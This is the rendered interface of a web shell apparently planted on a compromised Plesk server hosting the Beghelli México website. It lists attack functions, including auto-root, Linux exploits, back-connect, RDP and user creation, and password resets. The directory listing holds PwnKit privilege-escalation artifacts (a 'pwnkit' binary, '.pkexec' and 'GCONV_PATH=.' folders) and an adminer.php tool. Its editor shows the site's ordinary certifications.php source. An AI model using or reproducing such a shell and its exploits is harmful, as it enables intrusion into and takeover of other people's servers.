Linux cool-chatelet.209-46-124-25.plesk.page 6.8.0-60-generic #63-Ubuntu SMP PREEMPT_DYNAMIC Tue Apr 15 19:04:15 UTC 2025 x86_64
nginx/1.26.3
: 209.46.124.25 | : 216.73.216.5
Cant Read [ /etc/named.conf ]
8.3.21
beghelli.com.mx_t822czighbk
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
vhosts /
beghelli.com.mx /
httpdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
ajax
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
cms
[ DIR ]
drwxr-xr-x
config
[ DIR ]
drwxr-xr-x
controller
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
.htaccess
385
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
404.html
2.91
KB
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
authorized-agents.php
26.61
KB
-rw-r--r--
beghelli-group.php
31.82
KB
-rw-r--r--
certifications.php
28.79
KB
-rw-r--r--
downloads.php
26.53
KB
-rw-r--r--
fotometrias.php
5.12
KB
-rw-r--r--
index.php
42.95
KB
-rw-r--r--
info-rq.php
29.12
KB
-rw-r--r--
investor-relations.php
27.09
KB
-rw-r--r--
partnerships.php
28.16
KB
-rw-r--r--
privacy-notice.php
49.14
KB
-rw-r--r--
product-detail.php
28.31
KB
-rw-r--r--
product-literature.php
26.79
KB
-rw-r--r--
products-area.html
30.87
KB
-rw-r--r--
products-area.php
29.9
KB
-rw-r--r--
products-category.php
35.76
KB
-rw-r--r--
products-search.php
31.32
KB
-rw-r--r--
provider.php
34.14
KB
-rw-r--r--
providers-login.php
2.58
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
representant-login.php
2.61
KB
-rw-r--r--
representant.php
68.88
KB
-rw-r--r--
robots.txt
149
B
-rw-r--r--
sitemap.xml
79.16
KB
-rw-r--r--
success-cases.php
52.94
KB
-rw-r--r--
support.php
40.39
KB
-rw-r--r--
thank-you.php
23.76
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : certifications.php
<?php $ajaxRequest = false; require_once 'controller/categoryController.php'; $controller = new categoryController(); $iluminacion = $controller->get_categories_by_area(1); $emergencia = $controller->get_categories_by_area(2); $horticultura = $controller->get_categories_by_area(3); $planet_sun = $controller->get_categories_by_area(4); $portatil = $controller->get_categories_by_area(5); $outlet = $controller->get_categories_by_area(6); $logica = $controller->get_categories_by_area(7); $sanificaaria = $controller->get_categories_by_area(8); ?> <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Site Reference --> <meta name="description" content="Certificaciones"/> <meta name="keywords" content="beghelli, certificaciones"/> <meta name="author" content="Gustavo Bernal Cervantes"/> <meta name="theme-color" content="#012D3E"/> <link rel="canonical" href="https://beghelli.com.mx/"/> <title>Beghelli | Certificaciones</title> <!-- Favicon Tags --> <link rel="apple-touch-icon" sizes="180x180" href="assets/favicon/apple-touch-icon.png"> <link rel="icon" type="image/png" sizes="32x32" href="assets/favicon/favicon-32x32.png"> <link rel="icon" type="image/png" sizes="16x16" href="assets/favicon/favicon-16x16.png"> <link rel="manifest" href="assets/favicon/site.webmanifest"> <!-- OG Meta Tags --> <meta property="og:title" content="Beghelli | Certificaciones"/> <meta property="og:url" content="https://beghelli.com.mx/"/> <meta property="og:image" content="assets/img/og.png"/> <meta property="og:type" content="website"/> <meta property="og:description" content="Área técnica"/> <meta property="og:locale" content="es_MX"/> <!-- Resources --> <link href="https://fonts.cdnfonts.com/css/sofia-pro" rel="stylesheet"> <link rel="stylesheet" href="css/normalize.css"> <link rel="stylesheet" href="css/style.css"> <script src="https://kit.fontawesome.com/785530d049.js" crossorigin="anonymous"></script> <!-- Cliengo installation for beghelli.com.mx --> <script type="text/javascript"> (function () { var ldk = document.createElement('script'); ldk.type = 'text/javascript'; ldk.async = true; ldk.src = 'https://s.cliengo.com/weboptimizer/63b74475b5d786002a9a087c/63b74477b5d786002a9a0881.js?platform=dashboard'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ldk, s); })(); </script> </head> <body data-scroll=""> <header class="visible white"> <nav> <a href="<?php echo WEBURL;?>index.php"> <img src="assets/img/logo-blue.svg" alt="Logo Beghelli"> </a> <div class="nav__categories"> <button data-menu="us">Grupo Beghelli</button> <button data-menu="products">Productos</button> <button data-menu="technical">Área técnica</button> <button data-menu="search"> <i class="fa-regular fa-magnifying-glass"></i> </button> </div> <div class="nav__contact"> <a href="<?php echo WEBURL;?>support.php">Soporte</a> <a href="<?php echo WEBURL;?>info-rq.php">Contacto</a> </div> <button class="nav__close-btn"> <i class="fa-light fa-xmark"></i> </button> <button class="nav__mob-btn"> <i class="fa-regular fa-bars-staggered"></i> </button> </nav> <div id="menu-us" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h3>¿Quiénes somos?</h3> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h3>Representantes de ventas</h3> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h3>Distribuidores</h3> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h3>Asociaciones</h3> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> <div id="menu-products" class="header__menu columns hidden"> <div class="header__menu-column"> <h3>Iluminación</h3> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Emergencia</h3> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Horticultura</h3> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Iluminación solar</h3> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Outlet</h3> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Iluminación Portátil</h3> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <div class="spacer"></div> <div class="header__menu-column"> <h3>Lógica</h3> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h3>Sanificaaria</h3> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> <div id="menu-technical" class="header__menu gallery hidden"> <a href="<?php echo WEBURL;?>product-literature.php"> <h3>Catálogos</h3> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h3>Casos de Éxito</h3> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h3>Información Técnica</h3> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h3>Certificaciones</h3> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> <div id="menu-search" class="header__menu search hidden"> <form action="products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> </div> <div id="menu-mob" class="header__menu-mob hidden"> <form action="products-search.php" method="GET" class="home__search"> <input type="text" name="search-text" id="search-text" placeholder="¿Qué producto buscas?"> <button type="submit"> <i class="fa-solid fa-magnifying-glass"></i> </button> </form> <div class="header__mob-collaps"> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>beghelli-group.php"> <h4>¿Quiénes somos?</h4> <img src="<?php echo WEBURL;?>assets/img/beghelli-group.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>authorized-agents.php"> <h4>Representates de ventas</h4> <img src="<?php echo WEBURL;?>assets/img/authorized-agents.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>investor-relations.php"> <h4>Distribuidores</h4> <img src="<?php echo WEBURL;?>assets/img/investor-relations.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>partnerships.php"> <h4>Asociaciones</h4> <img src="<?php echo WEBURL;?>assets/img/partnerships.jpg" alt=""> </a> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Productos</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-columns"> <div> <h4>Iluminación</h4> <?php foreach($iluminacion as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación solar</h4> <?php foreach($planet_sun as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Outlet</h4> <?php foreach($outlet as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Iluminación Portátil</h4> <?php foreach($portatil as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> <span class="spacer"></span> <div> <h4>Emergencia</h4> <?php foreach($emergencia as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Horticultura</h4> <?php foreach($horticultura as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Lógica</h4> <?php foreach($logica as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> <h4>Sanificaaria</h4> <?php foreach($sanificaaria as $cat): ?> <a href="<?php echo WEBURL; ?>products-category/<?php echo $cat['clean_name']; ?>/"><?php echo $cat['name']; ?></a> <?php endforeach; ?> </div> </div> </div> </div> <div class="beghelli__collapsible"> <div class="beghelli__collap-header"> <h3>Grupo Beghelli</h3> <i class="fa-regular fa-chevron-down"></i> </div> <div class="beghelli__collap-cont"> <div class="header__mob-gallery"> <a href="<?php echo WEBURL;?>product-literature.php"> <h4>Catálogos</h4> <img src="<?php echo WEBURL;?>assets/img/product-literature.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>success-cases.php"> <h4>Casos de Éxito</h4> <img src="<?php echo WEBURL;?>assets/img/success-cases.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>downloads.php"> <h4>Información Técnica</h4> <img src="<?php echo WEBURL;?>assets/img/downloads.jpg" alt=""> </a> <a href="<?php echo WEBURL;?>certifications.php"> <h4>Certificaciones</h4> <img src="<?php echo WEBURL;?>assets/img/certifications.jpg" alt=""> </a> </div> </div> </div> </div> </div> </header> <main> <section class="beghelli__tech-list success"> <div class="beghelli__navigation"> <div class="beghelli__hierarchy"> <p>Área técnica</p> <i class="fa-regular fa-chevron-right"></i> <b>Certificaciones</b> </div> <div class="beghelli__category-nav"> <a href="product-literature.php">Catálogos</a> <a href="success-cases.php">Casos de éxito</a> <a href="downloads.php">Información técnica</a> <a class="current">Certificaciones</a> <button id="open-categories"> <i class="fa-regular fa-list"></i> </button> </div> </div> <h1>Certificaciones</h1> <br> <div class="beghelli__tech-cont"> <?php $ajaxRequest = false; require_once 'controller/certificationsController.php'; $controller = new certificationsController(); echo $controller = $controller->list_certifications_controller(); ?> <!-- <div class="tech__certification"> <img src="assets/img/certifications/ce.jpg" alt="Logo CE"> <p>La colocación del marcado CE en un producto obliga al fabricante a cumplir con las normas acordadas dentro del territorio de la Unión Europea con respecto a la seguridad, el rendimiento y el impacto ambiental, así como a garantizar al consumidor que el producto en cuestión cumple con estas normativas.</p> </div> <div class="tech__certification"> <img src="assets/img/certifications/ul.jpg" alt="Logo UL"> <p>La marca UL, certificación emitida por Underwriters Laboratories, significa que ha realizado pruebas en el producto y que ha determinado que éste cumple con las normativas vigentes u otros requisitos aplicables con respecto a su potencial riesgo de incendio, descarga eléctrica y peligros mecánicos. La Marca UL en un producto representa la conformidad del fabricante con la normativa vigente de forma continuada.</p> </div> <div class="tech__certification"> <img src="assets/img/certifications/nom.jpg" alt="Logo NOM"> <p>NOM (Norma Oficial Mexicana) es el símbolo que le permite al consumidor constatar que los productos cumplan con las normas oficiales de nuestro país que le aplican. Éste se obtiene por medio de la evaluación de conformidad efectuada por el Organismo de Certificación. Para ello, se toma como base la información técnica de los productos así como los resultados de las pruebas realizadas en laboratorios acreditados y aprobados conforme a la Ley Federal sobre Metrología y Normalización.</p> </div> <div class="tech__certification"> <img src="assets/img/certifications/dlc.jpg" alt="Logo DLC"> <p>DLC (DesignLights Consortium) es una certificación específica para la industria de la iluminación y si un producto de iluminación ha obtenido la certificación de esa organización, indica un alto nivel de eficiencia energética.</p> </div> <div class="tech__certification"> <img src="assets/img/certifications/etl.jpg" alt="Logo ETL"> <p>ETL (Electrical Testing Laboratories) es una organización independiente privada que lleva activa más de 100 años en el ámbito de las mediciones. La marca ETL Listed indica que el producto ha sido probado por un laboratorio de tercera parte acreditado como Intertek con arreglo a las normas de producto aplicables (estándar ANSI, estándar UL, estándares CSA, ASTM, NFPA) y a los requisitos mínimos de seguridad para poder venderse y distribuirse en el territorio norteamericano.</p> </div> <div class="tech__certification"> <img src="assets/img/certifications/sa.jpg" alt="Logo SA"> <p>CSA International (Canadian Standards Association), es un proveedor de servicios de certificación y prueba de productos para electricidad, mecánica, entre otros productos. Las marcas de certificación internacional de CSA indican que un producto, proceso o servicio se ha probado según un estándar canadiense o estadounidense y cumple con los requisitos de un estándar CSA aplicable u otro documento reconocido utilizado como base para la certificación.</p> </div> --> </div> <div class="beghelli__tech-img"> <img src="assets/img/downloads.jpg" alt=""> </div> </section> <div class="beghelli__category-modal"> <div class="overlay"></div> <div class="beghelli__category-modal-list"> <a href="product-literature.php">Catálogos</a> <a href="success-cases.php">Casos de éxito</a> <a href="downloads.php">Información técnica</a> <a class="current">Certificaciones</a> </div> <button id="close-categories"> <i class="fa-regular fa-xmark"></i> </button> </div> </main> <footer> <img src="assets/img/logo-blue.svg" alt="Beghelli logo azul"> <div class="footer__column"> <h4>Beghelli</h4> <a href="beghelli-group.php">¿Quiénes somos?</a> <a href="authorized-agents.php">Representantes de ventas</a> <a href="investor-relations.php">Distribuidores</a> <a href="partnerships.php">Asociaciones</a> </div> <div class="footer__column"> <h4>Área técnica</h4> <a href="product-literature.php">Catálogos</a> <a href="success-cases.php">Casos de éxito</a> <a href="downloads.php">Información técnica</a> <a href="#">Certificaciones</a> </div> <div class="footer__column"> <h4>Soporte</h4> <a href="support.php">Preguntas frecuentes</a> <a href="privacy-notice.php">Política de privacidad</a> </div> <div class="footer__row-second"> <div class="footer__links"> <a href="https://www.facebook.com/BeghelliMexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-facebook-f"></i> </a> <a href="https://www.instagram.com/beghellimexico/" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-instagram"></i> </a> <a href="https://www.linkedin.com/company/beghelli-méxico/?originalSubdomain=mx" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-linkedin-in"></i> </a> <a href="https://www.youtube.com/channel/UC11tlEqg4pWhmCj8mYY_pNg" target="_blank" rel="noopener noreferrer"> <i class="fa-brands fa-youtube"></i> </a> <div class="footer__global"> <button id="global-btn"> <i class="fa-regular fa-earth-americas"></i> México <i class="fa-solid fa-chevron-up"></i> </button> <div class="footer__global-drop-up"> <div> <div class="footer__global-links"> <h5>Global Website</h5> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Italiano</a> <a href="https://www.beghelli.it/en" target="_blank" rel="noopener noreferrer">English</a> <h5>Czech Republic</h5> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Czech</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">English</a> <a href="https://www.beghelli.it/en-cz" target="_blank" rel="noopener noreferrer">Russian</a> <h5>Germany</h5> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Deutsch</a> <a href="https://www.beghelli.it/en-de" target="_blank" rel="noopener noreferrer">English</a> <h5>Hungary</h5> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Magyar</a> <h5>Poland</h5> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Polski</a> <h5>Company website</h5> <a href="https://www.beghelliusa.com/" target="_blank" rel="noopener noreferrer">Beghelli Inc. (USA)</a> <a href="https://www.beluce.com/" target="_blank" rel="noopener noreferrer">Beghelli Canada Inc. (Canada)</a> <a href="https://www.beghelli.com.mx/" target="_blank" rel="noopener noreferrer">Beghelli de México (México)</a> <a href="https://www.beghelliasia.com/" target="_blank" rel="noopener noreferrer">Beghelli Asia Pacific Ltd (Hong Kong)</a> <a href="https://www.beghellichina.com/" target="_blank" rel="noopener noreferrer">Beghelli China (People's Respublic of China)</a> <a href="https://www.beghelli.it/cs-cz" target="_blank" rel="noopener noreferrer">Beghelli Elplast (Czhech Republic)</a> <a href="https://www.beghelli.it/de-de" target="_blank" rel="noopener noreferrer">Beghelli Präzisa (Germany)</a> <a href="https://www.beghelli.it/pl-pl" target="_blank" rel="noopener noreferrer">Beghelli Ploska (Poland)</a> <a href="https://www.beghelli.it/hu-hu" target="_blank" rel="noopener noreferrer">Beghelli Hungary (Hungary)</a> <a href="https://www.beghelli.it/it" target="_blank" rel="noopener noreferrer">Beghelli S. p. A. (Italy)</a> </div> </div> </div> </div> </div> <div class="footer__phone"> <h5>Llámanos</h5> <p>Lunes a viernes de 8:00 a 17:00 hrs</p> <i class="fa-light fa-phone-volume"></i> <span>442 221 6215</span> </div> </div> <div class="footer__row-third"> <div class="footer__simple-links"> <a href="privacy-notice.php">Política de privacidad</a> <div> <i class="fa-solid fa-lock"></i> <a href="representant-login.php">Soy representante</a> </div> <div> <i class="fa-solid fa-lock"></i> <a href="providers-login.php">Soy marketing partner</a> </div> </div> <p class="text">© Beghelli México - Av. del Marqués No. 70 Int. 4 Parque Industrial Bernardo Quintana, El Marqués, Qro.</p> </div> </footer> <!-- Scripts --> <script src="js/general.js"></script> <script src="js/collapsibles.js"></script> <script src="js/categories-modal.js"></script> </body> </html>
Close